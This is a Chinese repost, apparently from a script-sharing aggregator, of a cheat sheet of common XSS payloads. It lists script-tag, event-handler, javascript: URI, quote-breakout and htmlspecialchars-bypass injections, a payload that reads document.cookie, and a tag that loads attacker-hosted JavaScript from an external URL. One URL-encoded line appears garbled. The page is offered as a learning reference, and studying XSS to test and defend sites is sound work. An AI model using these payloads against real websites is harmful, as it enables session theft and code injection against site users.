脚本宝典收集整理的这篇文章主要介绍了xss之常见payload，脚本宝典觉得挺不错的，现在分享给大家，也给大家做个参考。

payload-有效载荷：<script>alert(1)</script>                 #最普通的xss<script>alert(document.cookie)</script>   #获取cookie<a href="javascript:alert('xss')">xss</a> #a链接的xss<script src='http://baidu.com/xss.js'></script>   # 外部攻击代码<img src=x onerror=alert(1)>              #加载图形失败执行<iframe onload=alert('xss')>              #框架<svg onload=alert(1)><video onloadstart=alert(1) src="/media/hack-the-planet.mp4" /><body onload=alert(1)><style onload=alert(1)></style><input onmouseover=alert(1)>              （简单防绕过）#' onclick="alert(111)">                  （使用DOM型的xss）xss之htmlspecialchars方法:1) ' onclick='alert(111)'  2) ' onmouseover='alert(1) 3) ' onmouseover='javascript:alert(1)' xss之href输出:(输入的参数在herf标签中，可以使用javascript协议来执行js)javascript:alert(1) xss之js输出lili'</script><script>alert("xss")</script>对于GET和POST 方式的，随便输入，检查在标签<p>中，就可以直接用简单的payload进行注入，如：<script>alert(1)</script>  <input onmouseover=alert(1)>  <body onload=alert(1)>URL编码："onmouseover="61leralertt(11)      %22onmouseover%3D%2261leralertt(11)

脚本宝典总结

以上是脚本宝典为你收集整理的xss之常见payload全部内容，希望文章能够帮你解决xss之常见payload所遇到的问题。

如果觉得脚本宝典网站内容还不错，欢迎将脚本宝典推荐好友。

本图文内容来源于网友网络收集整理提供，作为学习参考使用，版权属于原作者。
如您有任何意见或建议可联系处理。小编QQ：384754419，请注明来意。